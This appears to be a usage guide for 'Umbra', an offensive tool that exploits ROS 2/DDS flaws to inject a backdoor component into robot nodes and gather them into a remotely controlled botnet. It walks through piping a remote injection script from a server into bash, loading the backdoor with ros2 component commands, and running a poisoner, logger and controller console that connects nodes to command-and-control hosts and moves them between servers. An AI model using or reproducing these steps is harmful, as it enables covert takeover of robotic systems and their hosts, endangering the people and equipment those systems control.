ROS 2 protocol vulnerability: remote malicious component injection tool
Outlines security flaws such as cross‑subnet communication limits and container‑component privilege control defects. The core objective of the reported work is: by exploiting these vulnerabilities, construct a DDS botnet capable of remotely controlling multiple ROS 2 nodes, achieving persistent control and privilege escalation on target ROS 2 hosts.
Details:Umbra_Report_XX.pdf
No dependency on the ROS 2 environment conditions.
If you and the targets are on the same LAN, you can deploy it on your own host.
$ ./umbra_poisoner
The poisoner must use the --c2 <IP>:<PORT> argument to connect to the controller.
$ ./umbra_console
Records the number of ROS nodes deployed in the target LAN.
$ ./umbra_loger
- Initialize the malicious component into a normal ROS 2 system.
PS: in the exploit directory there is injection_xxxxx.sh
(Ubuntu-192.168.0.113)$ curl http://server/injection_xxxxx.sh | bash
(Ubuntu-192.168.0.113)$ ros2 component list
- Locally register the malicious component (can be remote provided both Ubuntus have ROS 2 installed)
(Ubuntu-192.168.0.113)$ source /dev/shm/umbra_backdoor_install/setup.bash; \
ros2 component load /UMBRA_192_168_0_113 umbra_backdoor umbra --node-name injection
- Launch the
umbra_consolecontroller
(Arch-192.168.0.112)$ ./umbra_console
- Launch the
umbra_logerlogger
(Arch-192.168.0.112)$ ./umbra_loger
- Launch the
umbra_poisonerpoisoner
(Arch-192.168.0.112)$ ./umbra_poisoner --c2 192.168.0.112:7010
- In the controller, enter the session, configure the node settings and connect to the C2
Umbra# use 959145908c4f64af8292392d692b5669
Umbra[959145908c4f64af8292392d692b5669]# show
Umbra[959145908c4f64af8292392d692b5669]# set HC2F 192.168.0.112:7010
Umbra[959145908c4f64af8292392d692b5669]# set HC2S 192.168.0.112:443
Umbra[959145908c4f64af8292392d692b5669]# run
- Update commands to migrate the node to another C2 host
Umbra[959145908c4f64af8292392d692b5669]# set HC2S xxxxx:xxxxx
Umbra[959145908c4f64af8292392d692b5669]# run
